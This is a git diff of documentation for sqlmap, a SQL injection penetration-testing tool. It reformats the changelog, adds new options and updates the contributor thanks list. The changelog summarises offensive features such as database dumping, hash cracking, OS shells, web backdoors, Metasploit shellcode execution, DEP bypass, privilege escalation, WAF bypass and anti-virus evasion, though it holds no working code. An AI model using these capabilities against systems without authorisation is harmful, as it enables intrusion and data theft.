message. +* Added option `--host` to set the HTTP Host header value. +* Added switch `--hostname` to turn on retrieval of DBMS server hostname. +* Added switch `--hpp` to turn on the usage of HTTP parameter pollution WAF bypass method. +* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS protection. +* Added switch `--ignore-401` to ignore HTTP Error Code 401 (Unauthorized). +* Added switch `--invalid-bignum` for usage of big numbers while invalidating values. +* Added switch `--invalid-logical` for usage of logical operations while invalidating values. +* Added switch `--invalid-string` for usage of random strings while invalidating values. +* Added option `--load-cookies` to set the file containing cookies in Netscape/wget format. +* Added option `-m` to set the textual file holding multiple targets for scanning purposes. +* Added option `--method` to force usage of provided HTTP method (e.g. `PUT`). +* Added switch `--no-cast` for turning off payload casting mechanism. +* Added switch `--no-escape` for turning off string escaping mechanism. +* Added option `--not-string` for setting string to be matched when query is evaluated to False. +* Added switch `--offline` to force work in offline mode (i.e. only use session data). +* Added option `--output-dir` to set custom output directory path. +* Added option `--param-del` to set character used for splitting parameter values. +* Added option `--pivot-column` to set column name that will be used while dumping tables by usage of pivot(ing). +* Added option `--proxy-file` to set file holding proxy list. +* Added switch `--purge-output` to turn on safe removal of all content(s) from output directory. +* Added option `--randomize` to set parameter name(s) that will be randomly changed during sqlmap run. +* Added option `--safe-post` to set POST data for sending to safe URL. +* Added option `--safe-req` for loading HTTP request from a file that will be used during sending to safe URL. +* Added option `--skip` to skip testing of given parameter(s). +* Added switch `--skip-static` to skip testing parameters that not appear to be dynamic. +* Added switch `--skip-urlencode` to skip URL encoding of payload data. +* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS protection. +* Added switch `--smart` to conduct thorough tests only if positive heuristic(s). +* Added option `--sql-file` for setting file(s) holding SQL statements to be executed (in case of stacked SQLi). +* Added switch `--sqlmap-shell` to turn on interactive sqlmap shell prompt. +* Added option `--test-filter` for test filtration by payloads and/or titles (e.g. `ROW`). +* Added option `--test-skip` for skipping tests by payloads and/or titles (e.g. `BENCHMARK`). +* Added switch `--titles` to turn on comparison of pages based only on their titles. +* Added option `--tor-port` to explicitly set Tor proxy port. +* Added option `--tor-type` to set Tor proxy type (`HTTP` (default), `SOCKS4` or `SOCKS5`). +* Added option `--union-from` to set table to be used in `FROM` part of UNION query SQL injection. +* Added option `--where` to set `WHERE` condition to be used during the table dumping. +* Added option `-X` to exclude DBMS database table column(s) from enumeration. +* Added option `-x` to set URL of sitemap(.xml) for target(s) parsing. +* Added option `-z` for usage of short mnemonics (e.g. `"flu,bat,ban,tec=EU"`). # Version 0.9 (2011-04-10) @@ -43,7 +154,7 @@ * Extended old `--dump -C` functionality to be able to search for specific database(s), table(s) and column(s), option `--search`. * Added support to tamper injection data with option `--tamper`. * Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack. -* Added support to enumerate roles on Oracle, --roles switch. +* Added support to enumerate roles on Oracle, `--roles` switch. * Added support for SOAP based web services requests. * Added support to fetch unicode data. * Added support to use persistent HTTP(s) connection for speed improvement, switch `--keep-alive`. @@ -88,18 +199,18 @@ * Major bugs fixed. * Cleanup of UDF source code repository, https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack. * Major code cleanup. -* Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus softwares that mistakenly mark sqlmap as a malware. +* Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus software that mistakenly mark sqlmap as a malware. * Updated user's manual. -* Created several demo videos, hosted on YouTube (http://www.youtube.com/user/inquisb) and linked from http://sqlmap.org/demo.html. +* Created several demo videos, hosted on YouTube (http://www.youtube.com/user/inquisb) and linked from https://sqlmap.org/demo.html. # Version 0.8 release candidate (2009-09-21) -* Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. +* Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (`--os-bof`) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. -* Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. -* Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. +* Added support for `--first` and `--last` so the user now has even more granularity in what to enumerate in the query output. +* Minor enhancement to save the session by default in 'output/hostname/session' file if `-s` option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring. @@ -108,13 +219,13 @@ * Adapted Metasploit wrapping functions to work with latest 3.3 development version too. * Adjusted code to make sqlmap 0.7 to work again on Mac OSX too. -* Reset takeover OOB features (if any of --os-pwn, --os-smbrelay or --os-bof is selected) when running under Windows because msfconsole and msfcli are not supported on the native Windows Ruby interpreter. This make sqlmap 0.7 to work again on Windows too. +* Reset takeover OOB features (if any of `--os-pwn`, `--os-smbrelay` or `--os-bof` is selected) when running under Windows because msfconsole and msfcli are not supported on the native Windows Ruby interpreter. This make sqlmap 0.7 to work again on Windows too. * Minor improvement so that sqlmap tests also all parameters with no value (eg. par=). * HTTPS requests over HTTP proxy now work on either Python 2.4, 2.5 and 2.6+. * Major bug fix to sql-query/sql-shell features. -* Major bug fix in --read-file option. +* Major bug fix in `--read-file` option. * Major silent bug fix to multi-threading functionality. -* Fixed the web backdoor functionality (for MySQL) when (usually) stacked queries are not supported and --os-shell is provided. +* Fixed the web backdoor functionality (for MySQL) when (usually) stacked queries are not supported and `--os-shell` is provided. * Fixed MySQL 'comment injection' version fingerprint. * Fixed basic Microsoft SQL Server 2000 fingerprint. * Many minor bug fixes and code refactoring. @@ -136,32 +247,32 @@ * Major enhancement to make the comparison algorithm work properly also on url not stables automatically by using the difflib Sequence Matcher object; * Major enhancement to support SQL data definition statements, SQL data manipulation statements, etc from user in SQL query and SQL shell if stacked queries are supported by the web application technology; * Major speed increase in DBMS basic fingerprint; -* Minor enhancement to support an option (--is-dba) to show if the current user is a database management system administrator; -* Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause bruteforcing; -* Added internal support to forge CASE statements, used only by --is-dba query at the moment; -* Minor layout adjustment to the --update output; +* Minor enhancement to support an option (`--is-dba`) to show if the current user is a database management system administrator; +* Minor enhancement to support an option (`--union-tech`) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause bruteforcing; +* Added internal support to forge CASE statements, used only by `--is-dba` query at the moment; +* Minor layout adjustment to the `--update` output; * Increased default timeout to 30 seconds; * Major bug fix to correctly handle custom SQL "limited" queries on Microsoft SQL Server and Oracle; * Major bug fix to avoid tracebacks when multiple targets are specified and one of them is not reachable; * Minor bug fix to make the Partial UNION query SQL injection technique work properly also on Oracle and Microsoft SQL Server; -* Minor bug fix to make the --postfix work even if --prefix is not provided; +* Minor bug fix to make the `--postfix` work even if `--prefix` is not provided; * Updated documentation. # Version 0.6.3 (2008-12-18) * Major enhancement to get list of targets to test from Burp proxy (http://portswigger.net/suite/) requests log file path or WebScarab proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project) 'conversations/' folder path by providing option -l ; * Major enhancement to support Partial UNION query SQL injection technique too; -* Major enhancement to test if the web application technology supports stacked queries (multiple statements) by providing option --stacked-test which will be then used someday also by takeover functionality; -* Major enhancement to test if the injectable parameter is affected by a time based blind SQL injection technique by providing option --time-test; +* Major enhancement to test if the web application technology supports stacked queries (multiple statements) by providing option `--stacked-test` which will be then used someday also by takeover functionality; +* Major enhancement to test if the injectable parameter is affected by a time based blind SQL injection technique by providing option `--time-test`; * Minor enhancement to fingerprint the web server operating system and the web application technology by parsing some HTTP response headers; * Minor enhancement to fingerprint the back-end DBMS operating system by parsing the DBMS banner value when -b option is provided; -* Minor enhancement to be able to specify the number of seconds before timeout the connection by providing option --timeout #, default is set to 10 seconds and must be 3 or higher; -* Minor enhancement to be able to specify the number of seconds to wait between each HTTP request by providing option --delay #; -* Minor enhancement to be able to get the injection payload --prefix and --postfix from user; +* Minor enhancement to be able to specify the number of seconds before timeout the connection by providing option `--timeout #`, default is set to 10 seconds and must be 3 or higher; +* Minor enhancement to be able to specify the number of seconds to wait between each HTTP request by providing option `--delay #`; +* Minor enhancement to be able to get the injection payload `--prefix` and `--postfix` from user; * Minor enhancement to be able to enumerate table columns and dump table entries, also when the database name is not provided, by using the current database on MySQL and Microsoft SQL Server, the 'public' scheme on PostgreSQL and the 'USERS' TABLESPACE_NAME on Oracle; -* Minor enhancemet to support also --regexp, --excl-str and --excl-reg options rather than only --string when comparing HTTP responses page content; -* Minor enhancement to be able to specify extra HTTP headers by providing option --headers. By default Accept, Accept-Language and Accept-Charset headers are set; -* Minor improvement to be able to provide CU (as current user) as user value (-U) when enumerating users privileges or users passwords; +* Minor enhancemet to support also `--regexp`, `--excl-str` and `--excl-reg` options rather than only `--string` when comparing HTTP responses page content; +* Minor enhancement to be able to specify extra HTTP headers by providing option `--headers`. By default Accept, Accept-Language and Accept-Charset headers are set; +* Minor improvement to be able to provide CU (as current user) as user value (`-U`) when enumerating users privileges or users passwords; * Minor improvements to sqlmap Debian package files; * Minor improvement to use Python psyco (http://psyco.sourceforge.net/) library if available to speed up the sqlmap algorithmic operations; * Minor improvement to retry the HTTP request up to three times in case an exception is raised during the connection to the target url; @@ -175,10 +286,10 @@ # Version 0.6.2 (2008-11-02) -* Major bug fix to correctly dump tables entries when --stop is not specified; +* Major bug fix to correctly dump tables entries when `--stop` is not specified; * Major bug fix so that the users' privileges enumeration now works properly also on both MySQL < 5.0 and MySQL >= 5.0; * Major bug fix when the request is POST to also send the GET parameters if any have been provided; -* Major bug fix to correctly update sqlmap to the latest stable release with command line --update; +* Major bug fix to correctly update sqlmap to the latest stable release with command line `--update`; * Major bug fix so that when the expected value of a query (count variable) is an integer and, for some reasons, its resumed value from the session file is a string or a binary file, the query is executed again and its new output saved to the session file; * Minor bug fix in MySQL comment injection fingerprint technique; * Minor improvement to correctly enumerate tables, columns and dump tables entries on Oracle and on PostgreSQL when the database name is not 'public' schema or a system database; @@ -191,20 +302,20 @@ * Major bug fix to blind SQL injection bisection algorithm to handle an exception; * Added a Metasploit Framework 3 auxiliary module to run sqlmap; * Implemented possibility to test for and inject also on LIKE statements; -* Implemented --start and --stop options to set the first and the last table entry to dump; -* Added non-interactive/batch-mode (--batch) option to make it easy to wrap sqlmap in Metasploit and any other tool; +* Implemented `--start` and `--stop` options to set the first and the last table entry to dump; +* Added non-interactive/batch-mode (`--batch`) option to make it easy to wrap sqlmap in Metasploit and any other tool; * Minor enhancement to save also the length of query output in the session file when retrieving the query output length for ETA or for resume purposes; * Changed the order sqlmap dump table entries from column by column to row by row. Now it also dumps entries as they are stored in the tables, not forcing the entries' order alphabetically anymore; -* Minor bug fix to correctly handle parameters' value with % character. +* Minor bug fix to correctly handle parameters' value with `%` character. # Version 0.6 (2008-09-01) * Complete code refactor and many bugs fixed; * Added multithreading support to set the maximum number of concurrent HTTP requests; -* Implemented SQL shell (--sql-shell) functionality and fixed SQL query (--sql-query, before called -e) to be able to run whatever SELECT statement and get its output in both inband and blind SQL injection attack; -* Added an option (--privileges) to retrieve DBMS users privileges, it also notifies if the user is a DBMS administrator; -* Added support (-c) to read options from configuration file, an example of valid INI file is sqlmap.conf and support (--save) to save command line options on a configuration file; -* Created a function that updates the whole sqlmap to the latest stable version available by running sqlmap with --update option; +* Implemented SQL shell (`--sql-shell`) functionality and fixed SQL query (`--sql-query`, before called `-e`) to be able to run whatever SELECT statement and get its output in both inband and blind SQL injection attack; +* Added an option (`--privileges`) to retrieve DBMS users privileges, it also notifies if the user is a DBMS administrator; +* Added support (`-c`) to read options from configuration file, an example of valid INI file is sqlmap.conf and support (`--save`) to save command line options on a configuration file; +* Created a function that updates the whole sqlmap to the latest stable version available by running sqlmap with `--update` option; * Created sqlmap .deb (Debian, Ubuntu, etc.) and .rpm (Fedora, etc.) installation binary packages; * Created sqlmap .exe (Windows) portable executable; * Save a lot of more information to the session file, useful when resuming injection on the same target to not loose time on identifying injection, UNION fields and back-end DBMS twice or more times; @@ -216,8 +327,8 @@ * Improved XML files structure; * Implemented the possibility to change the HTTP Referer header; * Added support to resume from session file also when running with inband SQL injection attack; -* Added an option (--os-shell) to execute operating system commands if the back-end DBMS is MySQL, the web server has the PHP engine active and permits write access on a directory within the document root; -* Added a check to assure that the provided string to match (--string) is within the page content; +* Added an option (`--os-shell`) to execute operating system commands if the back-end DBMS is MySQL, the web server has the PHP engine active and permits write access on a directory within the document root; +* Added a check to assure that the provided string to match (`--string`) is within the page content; * Fixed various queries in XML file; * Added LIMIT, ORDER BY and COUNT queries to the XML file and adapted the library to parse it; * Fixed password fetching function, mainly for Microsoft SQL Server and reviewed the password hashes parsing function; @@ -225,7 +336,7 @@ * Enhanced logging system: added three more levels of verbosity to show also HTTP sent and received traffic; * Enhancement to handle Set-Cookie from target url and automatically re-establish the Session when it expires; * Added support to inject also on Set-Cookie parameters; -* Implemented TAB completion and command history on both --sql-shell and --os-shell; +* Implemented TAB completion and command history on both `--sql-shell` and `--os-shell`; * Renamed some command line options; * Added a conversion library; * Added code schema and reminders for future developments; @@ -237,19 +348,19 @@ # Version 0.5 (2007-11-04) * Added support for Oracle database management system -* Extended inband SQL injection functionality (--union-use) to all other possible queries since it only worked with -e and --file on all DMBS plugins; +* Extended inband SQL injection functionality (`--union-use`) to all other possible queries since it only worked with `-e` and `--file` on all DMBS plugins; * Added support to extract database users password hash on Microsoft SQL Server; * Added a fuzzer function with the aim to parse HTML page looking for standard database error messages consequently improving database fingerprinting; * Added support for SQL injection on HTTP Cookie and User-Agent headers; -* Reviewed HTTP request library (lib/request.py) to support the extended inband SQL injection functionality. Splitted getValue() into getInband() and getBlind(); +* Reviewed HTTP request library (lib/request.py) to support the extended inband SQL injection functionality. Split getValue() into getInband() and getBlind(); * Major enhancements in common library and added checkForBrackets() method to check if the bracket(s) are needed to perform a UNION query SQL injection attack; -* Implemented --dump-all functionality to dump entire DBMS data from all databases tables; -* Added support to exclude DBMS system databases' when enumeration tables and dumping their entries (--exclude-sysdbs); +* Implemented `--dump-all` functionality to dump entire DBMS data from all databases tables; +* Added support to exclude DBMS system databases' when enumeration tables and dumping their entries (`--exclude-sysdbs`); * Implemented in Dump.dbTableValues() method the CSV file dumped data automatic saving in csv/ folder by default; * Added DB2, Informix and Sybase DBMS error messages and minor improvements in xml/errors.xml; * Major improvement in all three DBMS plugins so now sqlmap does not get entire databases' tables structure when all of database/table/ column are specified to be dumped; * Important fixes in lib/option.py to make sqlmap properly work also with python 2.5 and handle the CSV dump files creation work also under Windows operating system, function __setCSVDir() and fixed also in lib/dump.py; -* Minor enhancement in lib/injection.py to randomize the number requested to test the presence of a SQL injection affected parameter and implemented the possibilities to break (q) the for cycle when using the google dork option (-g); +* Minor enhancement in lib/injection.py to randomize the number requested to test the presence of a SQL injection affected parameter and implemented the possibilities to break (q) the for cycle when using the google dork option (`-g`); * Minor fix in lib/request.py to properly encode the url to request in case the "fixed" part of the url has blank spaces; * More minor layout enhancements in some libraries; * Renamed DMBS plugins; @@ -260,21 +371,21 @@ * Added DBMS fingerprint based also upon HTML error messages parsing defined in lib/parser.py which reads an XML file defining default error messages for each supported DBMS; * Added Microsoft SQL Server extensive DBMS fingerprint checks based upon accurate '@@version' parsing matching on an XML file to get also the exact patching level of the DBMS; -* Added support for query ETA (Estimated Time of Arrival) real time calculation (--eta); -* Added support to extract database management system users password hash on MySQL and PostgreSQL (--passwords); -* Added docstrings to all functions, classes and methods, consequently released the sqlmap development documentation ; -* Implemented Google dorking feature (-g) to take advantage of Google results affected by SQL injection to perform other command line argument on their DBMS; +* Added support for query ETA (Estimated Time of Arrival) real time calculation (`--eta`); +* Added support to extract database management system users password hash on MySQL and PostgreSQL (`--passwords`); +* Added docstrings to all functions, classes and methods, consequently released the sqlmap development documentation ; +* Implemented Google dorking feature (`-g`) to take advantage of Google results affected by SQL injection to perform other command line argument on their DBMS; * Improved logging functionality: passed from banal 'print' to Python native logging library; -* Added support for more than one parameter in '-p' command line option; -* Added support for HTTP Basic and Digest authentication methods (--basic-auth and --digest-auth); -* Added the command line option '--remote-dbms' to manually specify the remote DBMS; -* Major improvements in union.UnionCheck() and union.UnionUse() functions to make it possible to exploit inband SQL injection also with database comment characters ('--' and '#') in UNION query statements; -* Added the possibility to save the output into a file while performing the queries (-o OUTPUTFILE) so it is possible to stop and resume the same query output retrieving in a second time (--resume); -* Added support to specify the database table column to enumerate (-C COL); -* Added inband SQL injection (UNION query) support (--union-use); +* Added support for more than one parameter in `-p` command line option; +* Added support for HTTP Basic and Digest authentication methods (`--basic-auth` and `--digest-auth`); +* Added the command line option `--remote-dbms` to manually specify the remote DBMS; +* Major improvements in union.UnionCheck() and union.UnionUse() functions to make it possible to exploit inband SQL injection also with database comment characters (`--` and `#`) in UNION query statements; +* Added the possibility to save the output into a file while performing the queries (`-o OUTPUTFILE`) so it is possible to stop and resume the same query output retrieving in a second time (`--resume`); +* Added support to specify the database table column to enumerate (`-C COL`); +* Added inband SQL injection (UNION query) support (`--union-use`); * Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements; * Reviewed the directory tree structure; -* Splitted lib/common.py: inband injection functionalities now are moved to lib/union.py; +* Split lib/common.py: inband injection functionalities now are moved to lib/union.py; * Updated documentation files. # Version 0.3 (2007-01-20) @@ -282,10 +393,10 @@ * Added module for MS SQL Server; * Strongly improved MySQL dbms active fingerprint and added MySQL comment injection check; * Added PostgreSQL dbms active fingerprint; -* Added support for string match (--string); -* Added support for UNION check (--union-check); +* Added support for string match (`--string`); +* Added support for UNION check (`--union-check`); * Removed duplicated code, delegated most of features to the engine in common.py and option.py; -* Added support for --data command line argument to pass the string for POST requests; +* Added support for `--data` command line argument to pass the string for POST requests; * Added encodeParams() method to encode url parameters before making http request; * Many bug fixes; * Rewritten documentation files; diff --git a/doc/FAQ.pdf b/doc/FAQ.pdf deleted file mode 100644 index a60079e06de..00000000000 Binary files a/doc/FAQ.pdf and /dev/null differ diff --git a/doc/README.pdf b/doc/README.pdf deleted file mode 100644 index b5b21e9a306..00000000000 Binary files a/doc/README.pdf and /dev/null differ diff --git a/doc/THANKS.md b/doc/THANKS.md index 94786e8f4b8..62d4ba136cf 100644 --- a/doc/THANKS.md +++ b/doc/THANKS.md @@ -1,762 +1,819 @@ # Individuals -Andres Tarasco Acuna, +Andres Tarasco Acuna, * for suggesting a feature -Santiago Accurso, +Santiago Accurso, * for reporting a bug -Zaki Akhmad, +Syed Afzal, +* for contributing a WAF script varnish.py + +Zaki Akhmad, * for suggesting a couple of features -Olu Akindeinde, +Olu Akindeinde, * for reporting a couple of bugs -David Alvarez, +David Alvarez, * for reporting a bug -Sergio Alves, +Sergio Alves, * for reporting a bug -Thomas Anderson, +Thomas Anderson, * for reporting a bug -Chip Andrews, +Chip Andrews, * for his excellent work maintaining the SQL Server versions database at SQLSecurity.com and permission to implement the update feature taking data from his site -Smith Andy, +Smith Andy, * for suggesting a feature -Otavio Augusto, +Otavio Augusto, * for reporting a minor bug -Simon Baker, +Simon Baker, * for reporting some bugs -Ryan Barnett, +Ryan Barnett, * for organizing the ModSecurity SQL injection challenge, http://modsecurity.org/demo/challenge.html -Emiliano Bazaes, +Emiliano Bazaes, * for reporting a minor bug -Daniele Bellucci, +Daniele Bellucci, * for starting sqlmap project and developing it between July and August 2006 -Sebastian Bittig, and the rest of the team at r-tec IT Systeme GmbH +Sebastian Bittig, and the rest of the team at r-tec IT Systeme GmbH * for contributing the DB2 support initial patch: fingerprint and enumeration -Anthony Boynes, +Anthony Boynes, * for reporting several bugs Marcelo Toscani Brandao * for reporting a bug -Velky Brat, +Velky Brat, * for suggesting a minor enhancement to the bisection algorithm -James Briggs, +James Briggs, * for suggesting a minor enhancement -Gianluca Brindisi, +Gianluca Brindisi, * for reporting a couple of bugs -Jack Butler, +Jack Butler, * for contributing the sqlmap site favicon -Ulisses Castro, +Ulisses Castro, * for reporting a bug -Roberto Castrogiovanni, +Roberto Castrogiovanni, * for reporting a minor bug -Cesar Cerrudo, +Cesar Cerrudo, * for his Windows access token kidnapping tool Churrasco included in sqlmap tree as a contrib library and used to run the stand-alone payload stager on the target Windows machine as SYSTEM user if the user wants to perform a privilege escalation attack, http://www.argeniss.com/research/TokenKidnapping.pdf -Karl Chen, +Karl Chen, * for contributing the initial multi-threading patch for the inference algorithm -Y P Chien, +Y P Chien, * for reporting a minor bug -Pierre Chifflier, and Mark Hymers, +Pierre Chifflier, and Mark Hymers, * for uploading and accepting the sqlmap Debian package to the official Debian project repository -Chris Clements, +Hysia Chow +* for contributing a couple of WAF scripts + +Chris Clements, * for reporting a couple of bugs -John Cobb, +John Cobb, * for reporting a minor bug -Andreas Constantinides, +Andreas Constantinides, * for reporting a minor bug -Andre Costa, +Andre Costa, * for reporting a minor bug * for suggesting a minor enhancement -Ulises U. Cune, +Ulises U. Cune, * for reporting a bug -Alessandro Curio, +Alessandro Curio, * for reporting a minor bug -Alessio Dalla Piazza, +Alessio Dalla Piazza, * for reporting a couple of bugs -Sherif El-Deeb, +Alexis Danizan, +* for contributing support for ClickHouse + +Sherif El-Deeb, * for reporting a minor bug -Stefano Di Paola, +Thomas Etrillard, +* for contributing the IBM DB2 error-based payloads (RAISE_ERROR) + +Stefano Di Paola, * for suggesting good features -Mosk Dmitri, +Mosk Dmitri, * for reporting a minor bug -Carey Evans, +Meng Dong, +* for contributing a code for Waffit integration + +Carey Evans, * for his fcrypt module that allows crypt(3) support on Windows platforms -Shawn Evans, +Shawn Evans, * for suggesting an idea for one tamper script, greatest.py -Adam Faheem, +Adam Faheem, * for reporting a few bugs -James Fisher, +James Fisher, * for contributing two very good feature requests * for his great tool too brute force directories and files names on web/application servers, DirBuster, http://tinyurl.com/dirbuster -Jim Forster, +Jim Forster, * for reporting a bug -Rong-En Fan, -* for commiting the sqlmap 0.5 port to the official FreeBSD project repository +Rong-En Fan, +* for committing the sqlmap 0.5 port to the official FreeBSD project repository -Giorgio Fedon, +Giorgio Fedon, * for suggesting a speed improvement for bisection algorithm * for reporting a bug when running against Microsoft SQL Server 2005 -Kasper Fons, +Kasper Fons, * for reporting several bugs -Jose Fonseca, -* for his Gprof2Dot utility for converting profiler output to dot graph(s) and for his XDot utility to render nicely dot graph(s), both included in sqlmap tree inside extra folder. These libraries are used for sqlmap development purposes only - http://code.google.com/p/jrfonseca/wiki/Gprof2Dot - http://code.google.com/p/jrfonseca/wiki/XDot - -Alan Franzoni, -* for helping me out with Python subprocess library +Alan Franzoni, +* for helping out with Python subprocess library -Harold Fry, +Harold Fry, * for suggesting a minor enhancement -Daniel G. Gamonal, +Daniel G. Gamonal, * for reporting a minor bug -Marcos Mateos Garcia, +Marcos Mateos Garcia, * for reporting a minor bug -Andrew Gecse, +Andrew Gecse, * for reporting a minor issue -Ivan Giacomelli, +Ivan Giacomelli, * for reporting a bug * for suggesting a minor enhancement * for reviewing the documentation -Nico Golde, +Dimitris Giannitsaros, +* for contributing a REST-JSON API client + +Nico Golde, * for reporting a couple of bugs -Oliver Gruskovnjak, +Oliver Gruskovnjak, * for reporting a bug * for contributing a minor patch -Davide Guerri, +Davide Guerri, * for suggesting an enhancement -Dan Guido, +Dan Guido, * for promoting sqlmap in the context of the Penetration Testing and Vulnerability Analysis class at the Polytechnic University of New York, http://isisblogs.poly.edu/courses/pentest/ -David Guimaraes, +David Guimaraes, * for reporting considerable amount of bugs * for suggesting several features -Chris Hall, -* for coding the prettyprint.py library - -Tate Hansen, +Tate Hansen, * for donating to sqlmap development -Mario Heiderich, -Christian Matthies, -Lars H. Strojny, -* for their great tool PHPIDS included in sqlmap tree as a set of rules for testing payloads against IDS detection, http://php-ids.org +Mario Heiderich, +Christian Matthies, +Lars H. Strojny, +* for their great tool PHPIDS included in sqlmap tree as a set of rules for testing payloads against IDS detection, https://github.com/PHPIDS/PHPIDS -Kristian Erik Hermansen, +Kristian Erik Hermansen, * for reporting a bug * for donating to sqlmap development -Alexander Hagenah, +Alexander Hagenah, * for reporting a minor bug -Dennis Hecken, +Dennis Hecken, * for reporting a minor bug -Choi Ho, +Choi Ho, * for reporting a minor bug -Jorge Hoya, +Jorge Hoya, * for suggesting a minor enhancement -Will Holcomb, +Will Holcomb, * for his MultipartPostHandler class to handle multipart POST forms and permission to include it within sqlmap source code -Daniel Huckmann, +Daniel Huckmann, * for reporting a couple of bugs -Daliev Ilya, +Daliev Ilya, * for reporting a bug -Jovon Itwaru, +Mehmet İnce, +* for contributing a tamper script xforwardedfor.py + +Jovon Itwaru, * for reporting a minor bug -Prashant Jadhav, +Prashant Jadhav, * for reporting a bug -Dirk Jagdmann, +Dirk Jagdmann, * for reporting a typo in the documentation -Luke Jahnke, +Luke Jahnke, * for reporting a bug when running against MySQL < 5.0 -David Klein, +Andrew Kitis +* for contributing a tamper script lowercase.py + +David Klein, * for reporting a minor code improvement -Sven Klemm, +Sven Klemm, * for reporting two minor bugs with PostgreSQL -Anant Kochhar, +Anant Kochhar, * for providing with feedback on the user's manual -Dmitriy Kononov, +Dmitriy Kononov, * for reporting a minor bug -Alexander Kornbrust, +Alexander Kornbrust, * for reporting a couple of bugs -Krzysztof Kotowicz, +Krzysztof Kotowicz, * for reporting a minor bug -Nicolas Krassas, +Nicolas Krassas, * for reporting a couple of bugs -Oliver Kuckertz, +Oliver Kuckertz, * for contributing a minor patch -Alex Landa, +Alex Landa, * for contributing a patch adding beta support for XML output -Guido Landi, +Guido Landi, * for reporting a couple of bugs * for the great technical discussions * for Microsoft SQL Server 2000 and Microsoft SQL Server 2005 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004) exploit development -* for presenting with me at SOURCE Conference 2009 in Barcelona (Spain) on September 21, 2009 and at CONfidence 2009 in Warsaw (Poland) on November 20, 2009 +* for presenting with Bernardo at SOURCE Conference 2009 in Barcelona (Spain) on September 21, 2009 and at CONfidence 2009 in Warsaw (Poland) on November 20, 2009 -Lee Lawson, +Lee Lawson, * for reporting a minor bug -John J. Lee, and others +John J. Lee, and others * for developing the clientform Python library used by sqlmap to parse forms when --forms switch is specified -Nico Leidecker, +Nico Leidecker, * for providing with feedback on a few features * for reporting a couple of bugs * for his great tool icmpsh included in sqlmap tree to get a command prompt via an out-of-band tunnel over ICMP, http://leidecker.info/downloads/icmpsh.zip -Gabriel Lima, +Gabriel Lima, * for reporting a couple of bugs -Svyatoslav Lisin, +Svyatoslav Lisin, * for suggesting a minor feature -Miguel Lopes, +Miguel Lopes, * for reporting a minor bug -Truong Duc Luong, +Truong Duc Luong, * for reporting a minor bug -Pavol Luptak, +Pavol Luptak, * for reporting a bug when injecting on a POST data parameter -Till Maas, +Till Maas, * for suggesting a minor feature -Michael Majchrowicz, +Michael Majchrowicz, * for extensively beta-testing sqlmap on various MySQL DBMS * for providing really appreciated feedback * for suggesting a lot of ideas and features -Ahmad Maulana, -* for contributing one tamper script, halfversionedmorekeywords.py +Vinícius Henrique Marangoni, +* for contributing a Portuguese translation of README.md + +Francesco Marano, +* for contributing the Microsoft SQL Server/Sybase error-based - Stacking (EXEC) payload + +Ahmad Maulana, +* for contributing a tamper script halfversionedmorekeywords.py -Ferruh Mavituna, +Ferruh Mavituna, * for exchanging ideas on the implementation of a couple of features -David McNab, +David McNab, * for his XMLObject module that allows XML files to be operated on like Python objects -Spencer J. McIntyre, +Spencer J. McIntyre, * for reporting a minor bug * for contributing a patch for OS fingerprinting on DB2 -Brad Merrell, +Brad Merrell, * for reporting a minor bug -Michael Meyer, +Michael Meyer, * for suggesting a minor feature -Enrico Milanese, +Enrico Milanese, * for reporting a minor bug * for sharing some ideas for the PHP backdoor -Liran Mimoni, +Liran Mimoni, * for reporting a minor bug -Marco Mirandola, +Marco Mirandola, * for reporting a minor bug -Devon Mitchell, +Devon Mitchell, * for reporting a minor bug -Anton Mogilin, +Anton Mogilin, * for reporting a few bugs -Sergio Molina, +Sergio Molina, * for reporting a minor bug -Anastasios Monachos, +Anastasios Monachos, * for providing some useful data * for suggesting a feature * for reporting a couple of bugs -Kirill Morozov, +Kirill Morozov, * for reporting a bug * for suggesting a feature -Alejo Murillo Moya, +Alejo Murillo Moya, * for reporting a minor bug * for suggesting a few features -Yonny Mutai, +Yonny Mutai, * for reporting a minor bug -Roberto Nemirovsky, -* for pointing me out some enhancements +Roberto Nemirovsky, +* for pointing out some enhancements -Simone Onofri, +Sebastian Nerz, +* for reporting a (potential) vulnerability in --eval + +Simone Onofri, * for patching the PHP web backdoor to make it work properly also on Windows -Michele Orru, +Michele Orru, * for reporting a couple of bug * for suggesting ideas on how to implement the RESTful API -Shaohua Pan, +Shaohua Pan, * for reporting several bugs * for suggesting a few features -Antonio Parata, +Antonio Parata, * for sharing some ideas for the PHP backdoor -Adrian Pastor, +Adrian Pastor, * for donating to sqlmap development -Christopher Patten, +Christopher Patten, * for reporting a bug in the blind SQL injection bisection algorithm -Zack Payton, +Zack Payton, * for reporting a minor bug -Jaime Penalba, +Jaime Penalba, * for contributing a patch for INSERT/UPDATE generic boundaries -Pedrito Perez, <0ark1ang3l@gmail.com> +Pedrito Perez, <0ark1ang3l(at)gmail.com> * for reporting a couple of bugs -Brandon Perry, +Brandon Perry, * for reporting a couple of bugs -Travis Phillips, +Travis Phillips, * for suggesting a minor enhancement -Mark Pilgrim, +Mark Pilgrim, * for 